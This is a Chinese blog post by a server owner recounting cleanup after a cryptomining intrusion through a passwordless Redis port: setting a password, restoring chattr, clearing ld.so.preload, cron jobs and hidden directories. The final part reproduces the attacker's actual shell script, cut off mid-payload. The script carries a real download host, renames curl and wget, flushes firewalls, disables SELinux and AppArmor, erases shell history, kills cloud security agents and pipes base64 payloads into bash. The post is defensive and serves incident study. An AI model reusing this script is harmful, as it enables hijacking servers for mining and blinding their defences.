服务器被挖矿(脚本文件攻击)(希望这一篇能解决你的问题吧)
服务器被攻击了,然后再不整改就被限制了
查阅了很多资料来应对,毕竟刚入手服务器啥也不知道
使用命令看一下,果然是有定时启动的
vim /var/log/cron
和界面上报错是一样的
一般这种是端口开放的问题,起初我还以为是docker的问题,我把docker的端口给关了,然后网上说是可能是像redis,或者其他端口配置没有安全配置导致的
一定要注意端口的问题,不然被攻击成矿机够折腾的。
此时,你可以尝试将redis端口给关了,我的话是
先检查下redis
进入redis,首先你要知道你的redis安装在哪了
whereis redis-cli
进入之后
redis-cli -p 6379
进入redis
查看自己的redis是否配置密码
那么脚本是很容易从这里入侵到你的服务器的
使用curl命令下载sh文件,跑一下就寄
设置redis 密码(临时,永久在下面)
config set requirepass ************
设置一下
当你退出之后在进行操作就不可以啦
但是这种方式是临时的,重启之后仍然会失效
那么我们在配置文件中进行配置
找到redis.conf
操作即可
可以在编辑中 使用/requirepass footbared
定位到位置,然后
requirepass *******就行了
重启redis
systemctl restart redis.service
systemctl status redis 查看状态
检查是否配置成功
跟前面一样,先进入目录中,然后登陆redis
输入get key*
发现是不行的
那么我们进行登录
auth ******(你刚才设置的密码)
结果输出为ok
然后就可以正常使用redis了
这里我打算重启下服务器,看是否还会被挖矿,但是心里是有数的,因为人家是通过接口进来的,已经完成挖矿配置了,应该是阻止不了的
在根目录下,使用ll -rta看看那些文件被修改了(脚本发生时间为9.25号10点左右)
尽量选择时间与发生日期相差不多的时间段,就比如跨越几年几个月的时间就算了吧
仔细检查/home /root 等地方
我是先在root发现了问题
然后我就看到了9.25号这些文件时间确实一模一样
authorized_keys 且是为了免密登陆的
那我开始执行删除
那么清洗其属性,本质也是系统权限设置的所以没事
那么我想使用chattr来修改文件属性权限
结果chattr: command not found
被脚本卸载了,麻了
那么如果你的还在的话,可以跳过了这一步了{
安装chattr
yum install e2fsprogs
一般可能安装包还是有的,没有卸载
所以可以直接用来安装
chattr 本身就是e2fsprogs
结果好家伙又出问题了
Failed to set locale, defaulting to C.UTF-8
安装失败
查询资料表示是因为没有设置好环境导致的
运行locale命令
解决方法为运行以下指令,在运行locale就没有这些问题了
echo "export LC_ALL=en_US.UTF-8" >> /etc/profile
source /etc/profile
现在继续安装
结果还是不行
chattr还是找不到命令
我尝试去找chattr,因为有点博客说chattr可能移到了其他地方
先切换到根目录,然后执行,其他子目录不一定找得到
find -name chattr
也顺便找到一些proc
大概这里出现:
find -name chattr
./var/lib/docker/overlay2/4362bde84fd652a9ab41989c1d6b5d688cb0d1345172265c142adb8cc776447c/diff/bin/chattr
./var/lib/docker/overlay2/8be99b28e5bc86f6d2158ca963df6ecac6a41e4b95a0e62f219f3bd2cebc14d3/diff/usr/bin/chattr
./var/lib/docker/overlay2/196f754ebc38c60aff435c92f2548d6808352eaf079d36cc5df49c592e2828be/diff/usr/bin/chattr
./var/lib/docker/overlay2/0b23070518ea4281899c2c772c207cb20c219330533d98fcaf930c90d72cdac9/diff/usr/bin/chattr
./var/lib/docker/overlay2/7a5f30a6ef8e0cc88330533f26f0c3bcc2f9ee85a850e27a726b74e48bcd0f5d/diff/usr/bin/chattr
./var/lib/docker/overlay2/1eadf06a371819054f343753563ecb36ce6fe4e1da9afd0b3fdd4aff15aeb883/diff/usr/bin/chattr
find: ‘./proc/150404/task/150404/net’: Invalid argument
find: ‘./proc/150404/net’: Invalid argument
find: ‘./proc/158775/task/158957/fdinfo’: No such file or directory
find: ‘./proc/158775/task/158957/ns’: No such file or directory
find: ‘./proc/158775/task/158957/net’: No such file or directory
find: ‘./proc/158775/task/158957/attr’: No such file or directory
find: ‘./proc/158775/task/158958’: No such file or directory
find: ‘./proc/158775/task/158960’: No such file or directory
find: ‘./proc/158775/task/158962’: No such file or directory
find: ‘./proc/158775/task/158963’: No such file or directory
find: ‘./proc/158775/task/158966’: No such file or directory
find: ‘./proc/158775/task/158969’: No such file or directory
find: ‘./proc/158775/task/158972’: No such file or directory
find: ‘./proc/158775/task/158973’: No such file or directory
find: ‘./proc/158775/task/158974’: No such file or directory
find: ‘./proc/158775/task/158977’: No such file or directory
find: ‘./proc/158775/task/158980/fd/206’: No such file or directory
find: ‘./proc/158775/task/158980/fd/207’: No such file or directory
find: ‘./proc/158775/task/158980/fd/209’: No such file or directory
find: ‘./proc/158775/task/158980/fd/210’: No such file or directory
find: ‘./proc/158775/task/158980/fd/212’: No such file or directory
find: ‘./proc/158775/task/158980/fd/213’: No such file or directory
find: ‘./proc/158775/task/158980/fd/214’: No such file or directory
find: ‘./proc/158775/task/158980/fd/215’: No such file or directory
find: ‘./proc/158775/task/158980/fd/216’: No such file or directory
find: ‘./proc/158775/task/158980/fd/218’: No such file or directory
find: ‘./proc/158775/task/158980/fd/221’: No such file or directory
find: ‘./proc/158775/task/158980/fd/227’: No such file or directory
find: ‘./proc/158775/task/158980/fd/228’: No such file or directory
find: ‘./proc/158775/task/158980/fd/229’: No such file or directory
find: ‘./proc/158775/task/158980/fd/230’: No such file or directory
find: ‘./proc/158775/task/158980/fd/232’: No such file or directory
find: ‘./proc/158775/task/158980/fd/234’: No such file or directory
find: ‘./proc/158775/task/158980/fd/235’: No such file or directory
find: ‘./proc/158775/task/158980/fd/237’: No such file or directory
find: ‘./proc/158775/task/158980/fd/238’: No such file or directory
find: ‘./proc/158775/task/158980/fd/240’: No such file or directory
find: ‘./proc/158775/task/158980/fd/242’: No such file or directory
find: ‘./proc/158775/task/158980/fd/245’: No such file or directory
find: ‘./proc/158775/task/158980/fd/248’: No such file or directory
find: ‘./proc/158775/task/158980/fd/249’: No such file or directory
find: ‘./proc/158775/task/158980/fd/250’: No such file or directory
find: ‘./proc/158775/task/158980/fd/252’: No such file or directory
find: ‘./proc/158775/task/158980/fd/255’: No such file or directory
find: ‘./proc/158775/task/158980/fd/258’: No such file or directory
find: ‘./proc/158775/task/158980/fd/261’: No such file or directory
find: ‘./proc/158775/task/158980/fd/262’: No such file or directory
find: ‘./proc/158775/task/158980/fd/267’: No such file or directory
find: ‘./proc/158775/task/158980/fd/270’: No such file or directory
find: ‘./proc/158775/task/158980/fd/272’: No such file or directory
find: ‘./proc/158775/task/158980/fd/276’: No such file or directory
find: ‘./proc/158775/task/158980/fd/278’: No such file or directory
find: ‘./proc/158775/task/158980/fd/280’: No such file or directory
find: ‘./proc/158775/task/158980/fd/283’: No such file or directory
find: ‘./proc/158775/task/158980/fd/289’: No such file or directory
find: ‘./proc/158775/task/158980/fd/291’: No such file or directory
find: ‘./proc/158775/task/158980/fd/292’: No such file or directory
find: ‘./proc/158775/task/158980/fd/293’: No such file or directory
find: ‘./proc/158775/task/158980/fd/294’: No such file or directory
find: ‘./proc/158775/task/158980/fd/299’: No such file or directory
find: ‘./proc/158775/task/158980/fd/300’: No such file or directory
find: ‘./proc/158775/task/158980/fd/301’: No such file or directory
find: ‘./proc/158775/task/158980/fd/305’: No such file or directory
find: ‘./proc/158775/task/158980/fd/306’: No such file or directory
find: ‘./proc/158775/task/158980/fd/308’: No such file or directory
find: ‘./proc/158775/task/158980/fd/310’: No such file or directory
find: ‘./proc/158775/task/158980/fd/311’: No such file or directory
find: ‘./proc/158775/task/158980/fd/314’: No such file or directory
find: ‘./proc/158775/task/158980/fd/315’: No such file or directory
find: ‘./proc/158775/task/158980/fd/316’: No such file or directory
find: ‘./proc/158775/task/158980/fd/317’: No such file or directory
find: ‘./proc/158775/task/158980/fd/318’: No such file or directory
find: ‘./proc/158775/task/158980/fd/319’: No such file or directory
find: ‘./proc/158775/task/158980/fd/320’: No such file or directory
find: ‘./proc/158775/task/158980/fd/323’: No such file or directory
find: ‘./proc/158775/task/158980/fd/324’: No such file or directory
find: ‘./proc/158775/task/158980/fd/325’: No such file or directory
find: ‘./proc/158775/task/158980/fd/326’: No such file or directory
find: ‘./proc/158775/task/158980/fd/328’: No such file or directory
find: ‘./proc/158775/task/158980/fd/330’: No such file or directory
find: ‘./proc/158775/task/158980/fd/333’: No such file or directory
find: ‘./proc/158775/task/158980/fd/335’: No such file or directory
find: ‘./proc/158775/task/158980/fd/336’: No such file or directory
find: ‘./proc/158775/task/158980/fd/337’: No such file or directory
find:
然后我打可以从这里下手,这一定有问题
首先是我到达./var/lib/docker 目录我直接删除overlay2/
清空
再次尝试,说我已经install
那么思考到可能yum没法搞了
那我我先卸载那些包吧,然后下一个官网上的包,然后解压试试能用不
过程:
yum remove e2fsprogs
成功删除
自行去找tar.gz包吧这里不放连接了,b站问题
上传到服务器上
我是放在opt下,然后解压
tar -xzvf e2fsprogs-1.46.5.tar.gz
解压完成,期间由于内存以及cpu拉满,等待了一段时间
然后进入文件夹
编译:
./configure
make
make install
完成装配
(如果在编译的过程出现错误等,自行百度搜素,一般是环境依赖不行导致的,下载或者使用其他方法)
即可
测试:
如果你到这里成功了,那么chattr应该是安装成功了
我通过这个并没有安装成功,麻了,继续寻找方法
从一篇博客找到了一个方法继续实验:
下载chattr.c文件,然后上传到服务器
文件地址在这里https://github.com/posborne/linux-programming-interface-exercises/chattr.c
删除所有有关chattr 以及 e2fsprogs
比如 /usr/bin/chattr
你可以用whereis chattr看一下在哪,然后删除他们
yum install e2fsprogs 重新下载即可
发现已经可以用chattr了
然后删除这些东西
}
chattr -ia 文件名
chattr -i 文件名
他有什么属性都给他清理了
接下来操作挖矿病毒crypto,pnscan文件
/usr/share目录下
可以看到crypto文件
有关的也都删了
保险起见whereis crypto一下
看到
定位到/usr/share/man这边
我现在已经想把这个man文件夹删除完了
lsattr 看一下man的属性
发现是一个e属性
rm -rf man 删除
现在在查找 pnscan 的东西
直接删
rm -rf pnscan
文件已经删除了
那么看一下进程
把ssh,python等进程先停了再说
然后把 有ia属性的文件夹都给删除
/etc/下的文件:
(cron.d,contab)
/var/spool/ :
并不显示出来占用高的进程
可以确定要么是top的问题,要么是故意掩盖住的问题
如果怀疑是top的问题,你可以用lsattr或者其他命令查看是否被篡改过了
或者下载htop来看cpu等一系列参数
但是我用htop也一样并无法看到
那么这个病毒要审视一下
netstat -anp
可以看到确实是有其他程序在运行的,且进程名为-
操作:
cat /etc/ld.so.preload
输出:
因为这个目录下有很多.so文件,我这里也不懂,暂时先删除刚才输出的部分文件
rm -rf '[cmake].so' 文件,结果为不允许操作,越是不允许越是确定这个文件有问题
chattr -i '[cmake]'.so
清理/etc/ld.so.preload
我这里打算先删除这些文件
删除过程中报了一个错
这里展示出来:
对ld.so.preload文件属性修改 (我的是有 i属性)
之后执行:
引用:
(该博客地址为:(https://blog.csdn.net/zhanghenan123/article/details/88718898)
echo "" > /etc/ld.so.preload
chattr +i /etc
rm -rf /var/spool/cron/*
rm -rf /etc/cron.d/*
chattr +i /var/spool/cron/
rm -f /usr/local/lib/lbb.so
chattr +i /usr/local/lib
killall kworkerds
rm -f /var/tmp/kworkerds*
rm -f /var/tmp/1.so
rm -f /tmp/kworkerds*
rm -f /tmp/1.so
rm -f /var/tmp/wc.conf
rm -f tmp/wc.conf
基本就是删除东西然后上锁,防止被修改
期中报错的是因为我直接把一个文件上层在这之前就删除了
/etc/rc.d/ etc下有关rc.d的文件都删了吧,这种删还不错的一般都是病毒
现在适应top来看一下
已经能定位到这个命令了
继续加油!
到这里其实很明朗了,pid该病毒是随机分配的,然后命令式【cmake】
以及masscan也要注意一下
那么使用ps -ef | grep pid 来看一下文件的位置
然后定位到文件位置
查看一下
执行删除
rm -rf cmake
rm -rf cmake.pid 文件
相关的都删除了
害怕有隐藏文件
果然,在本来ls 展示出来的文件中并没有这个
以及这个..lph/
里面的创建时间是9.25 与入侵时间一致
那么我删除
rm -rf ..lph/
查一下httpd
/bin/bash 我没有发现设么问题
/etc/.hjttpd/.../下面我发现了问题
注意这里ls 的话看其来没有东西,建议使用ls -a来看一下隐藏文件,好家伙,有很多,我第一反应是直接删了
rm -rf .../ 还不让删除
top命令
kill --9 pid (去杀死有关httpd的东西)
kill -9 所有cpu占据高的进程
OK到这里已经完成
最后提供这个脚本来供大家参考
方便研究,因为对一个脚本的研究才是最能解决服务器的原因
#!/bin/bash
##variables
domain=205.185.118.246
mainurl=http://$domain/b2f628/
proxyport=1414
#init environment
m_command()
{
if [ -x /bin/chattr ];then
mv /bin/chattr /bin/zzhcht
elif [ -x /usr/bin/chattr ];then
mv /usr/bin/chattr /usr/bin/zzhcht
fi
if [ -x /bin/zzhcht ];then
export CHATTR=/bin/zzhcht
elif [ -x /usr/bin/zzhcht ];then
export CHATTR=/usr/bin/zzhcht
else
export CHATTR=chattr
fi
if [ -f /bin/curl ];then
export CURL_CMD="/bin/curl"
elif [ -f /usr/bin/curl ];then
export CURL_CMD="/usr/bin/curl"
fi
if [ -f /bin/wget ];then
export WGET_CMD="/bin/wget"
elif [ -f /usr/bin/wget ];then
export WGET_CMD="/usr/bin/wget"
fi
if [ -x "/usr/bin/wge" -o -x "/bin/wge" ];then
if [ -f /bin/wge ];then
export WGET_CMD="/bin/wge"
elif [ -f /usr/bin/wge ];then
export WGET_CMD="/usr/bin/wge"
fi
mv /bin/wge /bin/wls || mv /usr/bin/wge /usr/bin/wls
fi
if [ -x "/usr/bin/wd1" -o -x "/bin/wd1" ];then
if [ -f /usr/bin/wd1 ];then
export WGET_CMD="/usr/bin/wd1"
elif [ -f /bin/wd1 ];then
export WGET_CMD="/bin/wd1"
fi
mv /bin/wd1 /bin/wls || mv /usr/bin/wd1 /usr/bin/wls
fi
if [ -x "/usr/bin/wget1" -o -x "/bin/wget1" ];then
if [ -f /bin/wget1 ];then
export WGET_CMD="/bin/wget1"
elif [ -f /usr/bin/wget1 ];then
export WGET_CMD="/usr/bin/wget1"
fi
mv /bin/wget1 /bin/wls || mv /usr/bin/wget1 /usr/bin/wls
fi
if [ -x "/usr/bin/wdt" -o -x "/bin/wdt" ];then
if [ -f /bin/wdt ];then
export WGET_CMD="/bin/wdt"
elif [ -f /usr/bin/wdt ];then
export WGET_CMD="/usr/bin/wdt"
fi
mv /bin/wdt /bin/wls || mv /usr/bin/wdt /usr/bin/wls
fi
if [ -x "/usr/bin/wdz" -o -x "/bin/wdz" ];then
if [ -f /usr/bin/wdz ];then
export WGET_CMD="/usr/bin/wdz"
elif [ -f /bin/wdz ];then
export WGET_CMD="/bin/wdz"
fi
cp /bin/wdz /bin/wls || cp /usr/bin/wdz /usr/bin/wls
fi
if [ -x "/usr/bin/xget" -o -x "bin/xget" ];then
if [ -f /bin/xget ];then
export WGET_CMD="/bin/xget"
elif [ -f /usr/bin/xget ];then
export WGET_CMD="/usr/bin/xget"
fi
mv /bin/xget /bin/wls || /usr/bin/xget /usr/bin/wls
fi
if [ -x "/bin/wls" ];then
export WGET_CMD="/bin/wls"
elif [ -x "/usr/bin/wls" ];then
export WGET_CMD="/usr/bin/wls"
else
if [ $(command -v yum) ];then
rpm -e --nodeps wget
yum remove -y wget
yum install -y wget
else
apt-get remove -y wget
apt-get install -y wget
fi
mv /bin/wget /bin/wls || mv /usr/bin/wget /usr/bin/wls
if [ -f /bin/wls ];then
export WGET_CMD="/bin/wls"
elif [ -f /usr/bin/wls ];then
export WGET_CMD="/usr/bin/wls"
fi
fi
if [ -x "/usr/bin/cd1" -o -x "/bin/cd1" ];then
if [ -f /bin/cd1 ];then
export CURL_CMD="/bin/cd1"
elif [ -f /usr/bin/cd1 ];then
export CURL_CMD="/usr/bin/cd1"
fi
mv /bin/cd1 /bin/cls || mv /usr/bin/cd1 /usr/bin/cls
fi
if [ -x "/usr/bin/curl" -o -x "/bin/curl" ];then
if [ -f /bin/curl ];then
export CURL_CMD="/bin/curl"
elif [ -f /usr/bin/curl ];then
export CURL_CMD="/usr/bin/curl"
fi
mv /bin/curl /bin/cls || mv /usr/bin/curl /usr/bin/cls
fi
if [ -x "/usr/bin/cdz" -o -x "/bin/cdz" ];then
if [ -f /bin/cdz ];then
export CURL_CMD="/bin/cdz"
elif [ -f /usr/bin/cdz ];then
export CURL_CMD="/usr/bin/cdz"
fi
cp /bin/cdz /bin/cls || cp /usr/bin/cdz /usr/bin/cls
fi
if [ -x "/usr/bin/cur" -o -x "/bin/cur" ];then
if [ -f /bin/cur ];then
export CURL_CMD="/bin/cur"
elif [ -f /usr/bin/cur ];then
export CURL_CMD="/usr/bin/cur"
fi
mv /bin/cur /bin/cls || mv /usr/bin/cur /usr/bin/cls
fi
if [ -x "/usr/bin/TNTcurl" -o -x "/bin/TNTcurl" ];then
if [ -f /bin/TNTcurl ];then
export CURL_CMD="/bin/TNTcurl"
elif [ -f /usr/bin/TNTcurl ];then
export CURL_CMD="/usr/bin/TNTcurl"
fi
mv /bin/TNTcurl /bin/cls || mv /usr/bin/TNTcurl /usr/bin/cls
fi
if [ -x "/usr/bin/curltnt" -o -x "/bin/curltnt" ];then
if [ -f /bin/curltnt ];then
export CURL_CMD="/bin/curltnt"
elif [ -f /usr/bin/curltxt ];then
export CURL_CMD="/usr/bin/curltnt"
fi
mv /bin/curltnt /bin/cls || mv /usr/bin/curltnt /usr/bin/cls
fi
if [ -x "/usr/bin/curl1" -o -x "/bin/curl1" ];then
if [ -f /bin/curl1 ];then
export CURL_CMD="/bin/curl1"
elif [ -f /usr/bin/curl1 ];then
export CURL_CMD="/usr/bin/curl1"
fi
mv /bin/curl1 /bin/cls || mv /usr/bin/curl1 /usr/bin/cls
fi
if [ -x "/usr/bin/cdt" -o -x "/bin/cdt" ];then
if [ -f /bin/cdt ];then
export CURL_CMD="/bin/cdt"
elif [ -f /usr/bin/cdt ];then
export CURL_CMD="/usr/bin/cdt"
fi
mv /bin/cdt /bin/cls || mv /usr/bin/cdt /usr/bin/cls
fi
if [ -x "/usr/bin/xcurl" -o -x "/bin/xcurl" ];then
if [ -f /bin/xcurl ];then
export CURL_CMD="/bin/xcurl"
elif [ -f /usr/bin/xcurl ];then
export CURL_CMD="/usr/bin/xcurl"
fi
mv /bin/xcurl /bin/cls || mv /usr/bin/xcurl /usr/bin/wls
fi
if [ -x "/usr/bin/cls" ];then
export CURL_CMD="/usr/bin/cls"
elif [ -x "/bin/cls" ];then
export CURL_CMD="/bin/cls"
else
if [ $(command -v yum) ];then
rpm -e --nodeps curl
yum remove curl
yum install -y curl
else
apt-get remove curl
apt-get install -y curl
fi
mv /bin/curl /bin/cls || mv /usr/bin/curl /usr/bin/cls
if [ -f /bin/cls ];then
export CURL_CMD="/bin/cls"
elif [ -f /usr/bin/cls ];then
export CURL_CMD="/usr/bin/cls"
fi
fi
}
yum_ins()
{
yum clean all
for pkg in gcc make kmod net-tools "kernel-devel-uname-r == $(uname -r)"
do
yum install -y $pkg
done
}
apk_ins()
{
apk update
for pkg in gcc make kmod linux-headers net-tools
do
apk add $pkg
done
}
apt_ins()
{
apt update --fix-missing
for pkg in gcc make kmod net-tools linux-headers-$(uname -r)
do
apt-get install -y $pkg
done
}
ins_package()
{
if
type apk 2>/dev/null 1>/dev/null;
then
apk_ins
fi
if
type apt 2>/dev/null 1>/dev/null;
then
apt_ins
fi
if
type yum 2>/dev/null 1>/dev/null;
then
yum_ins
fi
}
check_exist()
{
if [ -x /usr/bin/netstat -o /bin/netstat ]
then
for pt in $(netstat -an|grep EST|grep "$proxyport"|awk '{print $5}'|awk -F ":" '{print $NF}')
do
if [ "$pt" == "$proxyport" ];then
echo "miner running"
exit 1
else
echo "miner may not running,check next port"
fi
done
else
echo "haha"
fi
}
clean_monitor()
{
iptables -F
ulimit -n 65535 2>/dev/null 1>/dev/null
export LC_ALL=C
HISTCONTROL="ignorespace${HISTCONTROL:+:$HISTCONTROL}" 2>/dev/null 1>/dev/null
export HISTFILE=/dev/null 2>/dev/null 1>/dev/null
unset HISTFILE 2>/dev/null 1>/dev/null
shopt -ou history 2>/dev/null 1>/dev/null
set +o history 2>/dev/null 1>/dev/null
HISTSIZE=0 2>/dev/null 1>/dev/null
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
setenforce 0 2>/dev/null 1>/dev/null
echo SELINUX=disabled >/etc/selinux/config 2>/dev/null
if type systemctl 2>/dev/null 1>/dev/null; then systemctl stop apparmor 2>/dev/null 1>/dev/null ; systemctl disable apparmor 2>/dev/null 1>/dev/null ; else service apparmor stop 2>/dev/null 1>/dev/null ; fi
if type systemctl 2>/dev/null 1>/dev/null; then systemctl stop aliyun.service 2>/dev/null 1>/dev/null ; systemctl disable aliyun.service 2>/dev/null 1>/dev/null ; else service aliyun.service stop 2>/dev/null 1>/dev/null ; fi
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 % 2>/dev/null 1>/dev/null
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 % 2>/dev/null 1>/dev/null
if [ -d "/usr/local/aegis/" ]; then rm -rf /usr/local/aegis 2>/dev/null 1>/dev/null ; fi
if type ufw 2>/dev/null 1>/dev/null; then ufw disable 2>/dev/null 1>/dev/null ; fi
if type iptables 2>/dev/null 1>/dev/null; then iptables -F 2>/dev/null 1>/dev/null ; fi
sysctl kernel.nmi_watchdog=0 2>/dev/null 1>/dev/null
if [ -f "/proc/sys/kernel/nmi_watchdog" ]; then echo '0' >/proc/sys/kernel/nmi_watchdog 2>/dev/null ; fi
if [ -f "/etc/sysctl.conf" ]; then echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf 2>/dev/null ; fi
if ps aux | grep -i '[a]liyun' 2>/dev/null 1>/dev/null; then
echo 'IyEvYmluL2Jhc2gKCkFFR0lTX0lOU1RBTExfRElSPSIvdXNyL2xvY2FsL2FlZ2lzIgojY2hlY2sgbGludXggR2VudG9vIG9zIAp2YXI9YGxzYl9yZWxlYXNlIC1hIHwgZ3JlcCBHZW50b29gCmlmIFsgLXogIiR7dmFyfSIgXTsgdGhlbiAKCXZhcj1gY2F0IC9ldGMvaXNzdWUgfCBncmVwIEdlbnRvb2AKZmkKY2hlY2tDb3Jlb3M9YGNhdCAvZXRjL29zLXJlbGVhc2UgMj4vZGV2L251bGwgfCBncmVwIGNvcmVvc2AKaWYgWyAtZCAiL2V0Yy9ydW5sZXZlbHMvZGVmYXVsdCIgLWEgLW4gIiR7dmFyfSIgXTsgdGhlbgoJTElOVVhfUkVMRUFTRT0iR0VOVE9PIgplbGlmIFsgLWYgIi9ldGMvb3MtcmVsZWFzZSIgLWEgLW4gIiR7Y2hlY2tDb3Jlb3N9IiBdOyB0aGVuCglMSU5VWF9SRUxFQVNFPSJDT1JFT1MiCglBRUdJU19JTlNUQUxMX0RJUj0iL29wdC9hZWdpcyIKZWxzZSAKCUxJTlVYX1JFTEVBU0U9Ik9USEVSIgpmaQkJCgpzdG9wX2FlZ2lzX3BraWxsKCl7CiAgICBwa2lsbCAtOSBBbGlZdW5EdW4gPi9kZXYvbnVsbCAyPiYxCiAgICBwa2lsbCAtOSBBbGlIaWRzID4vZGV2L251bGwgMj4mMQogICAgcGtpbGwgLTkgQWxpSGlwcyA+L2Rldi9udWxsIDI+JjEKICAgIHBraWxsIC05IEFsaU5ldCA+L2Rldi9udWxsIDI+JjEKICAgIHBraWxsIC05IEFsaVNlY0d1YXJkID4vZGV2L251bGwgMj4mMQogICAgcGtpbGwgLTkgQWxpWXVuRHVuVXBkYXRlID4vZGV2L251bGwgMj4mMQogICAgCiAgICAvdXNyL2xvY2FsL2FlZ2lzL0FsaU5ldC9BbGlOZXQgLS1zdG9wZHJpdmVyCiAgICAvdXNyL2xvY2FsL2FlZ2lzL2FsaWhpcHMvQWxpSGlwcyAtLXN0b3Bkcml2ZXIKICAgIC91c3IvbG9jYWwvYWVnaXMvQWxpU2VjR3VhcmQvQWxpU2VjR3VhcmQgLS1zdG9wZHJpdmVyCiAgICBwcmludGYgIiUtNDBzICU0MHNcbiIgIlN0b3BwaW5nIGFlZ2lzIiAiWyAgT0sgIF0iCn0KCiMgY2FuIG5vdCByZW1vdmUgYWxsIGFlZ2lzIGZvbGRlciwgYmVjYXVzZSB0aGVyZSBpcyBiYWNrdXAgZmlsZSBpbiBnbG9iYWxjZmcKcmVtb3ZlX2FlZ2lzKCl7CmlmIFsgLWQgIiR7QUVHSVNfSU5TVEFMTF9ESVJ9IiBdO3RoZW4KICAgIHVtb3VudCAke0FFR0lTX0lOU1RBTExfRElSfS9hZWdpc19kZWJ1ZwogICAgcm0gLXJmICR7QUVHSVNfSU5TVEFMTF9ESVJ9L2FlZ2lzX2NsaWVudAogICAgcm0gLXJmICR7QUVHSVNfSU5TVEFMTF9ESVJ9L2FlZ2lzX3VwZGF0ZQoJcm0gLXJmICR7QUVHSVNfSU5TVEFMTF9ESVJ9L2FsaWhpZHMKICAgIHJtIC1yZiAke0FFR0lTX0lOU1RBTExfRElSfS9nbG9iYWxjZmcvZG9tYWluY2ZnLmluaQpmaQp9Cgp1bmluc3RhbGxfc2VydmljZSgpIHsKICAgCiAgIGlmIFsgLWYgIi9ldGMvaW5pdC5kL2FlZ2lzIiBdOyB0aGVuCgkJL2V0Yy9pbml0LmQvYWVnaXMgc3RvcCAgPi9kZXYvbnVsbCAyPiYxCgkJcm0gLWYgL2V0Yy9pbml0LmQvYWVnaXMgCiAgIGZpCgoJaWYgWyAkTElOVVhfUkVMRUFTRSA9ICJHRU5UT08iIF07IHRoZW4KCQlyYy11cGRhdGUgZGVsIGFlZ2lzIGRlZmF1bHQgMj4vZGV2L251bGwKCQlpZiBbIC1mICIvZXRjL3J1bmxldmVscy9kZWZhdWx0L2FlZ2lzIiBdOyB0aGVuCgkJCXJtIC1mICIvZXRjL3J1bmxldmVscy9kZWZhdWx0L2FlZ2lzIiA+L2Rldi9udWxsIDI+JjE7CgkJZmkKICAgIGVsaWYgWyAtZiAvZXRjL2luaXQuZC9hZWdpcyBdOyB0aGVuCiAgICAgICAgIC9ldGMvaW5pdC5kL2FlZ2lzICB1bmluc3RhbGwKCSAgICBmb3IgKCh2YXI9MjsgdmFyPD01OyB2YXIrKykpIGRvCgkJCWlmIFsgLWQgIi9ldGMvcmMke3Zhcn0uZC8iIF07dGhlbgoJCQkJIHJtIC1mICIvZXRjL3JjJHt2YXJ9LmQvUzgwYWVnaXMiCgkJICAgIGVsaWYgWyAtZCAiL2V0Yy9yYy5kL3JjJHt2YXJ9LmQiIF07dGhlbgoJCQkJcm0gLWYgIi9ldGMvcmMuZC9yYyR7dmFyfS5kL1M4MGFlZ2lzIgoJCQlmaQoJCWRvbmUKICAgIGZpCgp9CgpzdG9wX2FlZ2lzX3BraWxsCnVuaW5zdGFsbF9zZXJ2aWNlCnJlbW92ZV9hZWdpcwp1bW91bnQgJHtBRUdJU19JTlNUQUxMX0RJUn0vYWVnaXNfZGVidWcKCgpwcmludGYgIiUtNDBzICU0MHNcbiIgIlVuaW5zdGFsbGluZyBhZWdpcyIgICJbICBPSyAgXSIKCgoK' | base64 -d | bash 2>/dev/null 1>/dev/null
echo 'IyEvYmluL2Jhc2gKCiNjaGVjayBsaW51eCBHZW50b28gb3MgCnZhcj1gbHNiX3JlbGVhc2UgLWEgfCBncmVwIEdlbnRvb2AKaWYgWyAteiAiJHt2YXJ9IiBdOyB0aGVuIAoJdmFyPWBjYXQgL2V0Yy9pc3N1ZSB8IGdyZXAgR2VudG9vYApmaQoKaWYgWyAtZCAiL2V0Yy9ydW5sZXZlbHMvZGVmYXVsdCIgLWEgLW4gIiR7dmFyfSIgXTsgdGhlbgoJTElOVVhfUkVMRUFTRT0iR0VOVE9PIgplbHNlCglMSU5VWF9SRUxFQVNFPSJPVEhFUiIKZmkKCnN0b3BfYWVnaXMoKXsKCWtpbGxhbGwgLTkgYWVnaXNfY2xpID4vZGV2L251bGwgMj4mMQoJa2lsbGFsbCAtOSBhZWdpc191cGRhdGUgPi9kZXYvbnVsbCAyPiYxCglraWxsYWxsIC05IGFlZ2lzX2NsaSA+L2Rldi9udWxsIDI+JjEKICAgIHByaW50ZiAiJS00MHMgJTQwc1xuIiAiU3RvcHBpbmcgYWVnaXMiICJbICBPSyAgXSIKfQoKc3RvcF9xdWFydHooKXsKCWtpbGxhbGwgLTkgYWVnaXNfcXVhcnR6ID4vZGV2L251bGwgMj4mMQogICAgICAgIHByaW50ZiAiJS00MHMgJTQwc1xuIiAiU3RvcHBpbmcgcXVhcnR6IiAiWyAgT0sgIF0iCn0KCnJlbW92ZV9hZWdpcygpewppZiBbIC1kIC91c3IvbG9jYWwvYWVnaXMgXTt0aGVuCiAgICBybSAtcmYgL3Vzci9sb2NhbC9hZWdpcy9hZWdpc19jbGllbnQKICAgIHJtIC1yZiAvdXNyL2xvY2FsL2FlZ2lzL2FlZ2lzX3VwZGF0ZQpmaQp9CgpyZW1vdmVfcXVhcnR6KCl7CmlmIFsgLWQgL3Vzci9sb2NhbC9hZWdpcyBdO3RoZW4KCXJtIC1yZiAvdXNyL2xvY2FsL2FlZ2lzL2FlZ2lzX3F1YXJ0egpmaQp9CgoKdW5pbnN0YWxsX3NlcnZpY2UoKSB7CiAgIAogICBpZiBbIC1mICIvZXRjL2luaXQuZC9hZWdpcyIgXTsgdGhlbgoJCS9ldGMvaW5pdC5kL2FlZ2lzIHN0b3AgID4vZGV2L251bGwgMj4mMQoJCXJtIC1mIC9ldGMvaW5pdC5kL2FlZ2lzIAogICBmaQoKCWlmIFsgJExJTlVYX1JFTEVBU0UgPSAiR0VOVE9PIiBdOyB0aGVuCgkJcmMtdXBkYXRlIGRlbCBhZWdpcyBkZWZhdWx0IDI+L2Rldi9udWxsCgkJaWYgWyAtZiAiL2V0Yy9ydW5sZXZlbHMvZGVmYXVsdC9hZWdpcyIgXTsgdGhlbgoJCQlybSAtZiAiL2V0Yy9ydW5sZXZlbHMvZGVmYXVsdC9hZWdpcyIgPi9kZXYvbnVsbCAyPiYxOwoJCWZpCiAgICBlbGlmIFsgLWY